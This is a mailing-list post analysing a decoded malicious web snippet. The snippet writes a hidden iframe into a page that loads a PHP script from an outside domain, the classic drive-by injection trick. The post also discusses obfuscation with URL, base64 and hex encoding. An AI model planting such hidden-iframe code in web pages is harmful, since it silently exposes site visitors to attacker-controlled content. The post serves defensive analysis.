Actually, the scrambled or encoded code above results into below code. This
is a little old technique which still is hot subject for discussion... As in
the first step itself, it may be difficult to tell whether the code is
appropriate or infected....
----------------------------start of code -------------------------------
window.status='Done';document.write('<iframe name=b0 src=\'
http://fredkidns.com/checkupd.php?t=562?'+Math.round(Math.randafm()*14094)+'93dcc5f3\'
width=61 height=54 style=\'display: none\'></iframe>')″
---------------------------end of code----------------------------------
The same above techniques can be constructed in advanced way for
exploitation ofcourse, but can be decoded with little focus or google... :-)
However, little advanced about this is the obfuscation of code using some
keys or mechanisms instead of wellknown above (url encoding, base64, hex)
encoding / decoding techniques.
You guys can refer to below link which can do basic encoding or decoding for
you...
http://ostermiller.org/calc/encode.html
Regards
Sandeep Thakur
--
You received this message because you are subscribed to the Google Groups
"nforceit" group.
To post to this group, send an email to [email protected].
To unsubscribe from this group, send email to
[email protected].
For more options, visit this group at
http://groups.google.com/group/nforceit?hl=en-GB.
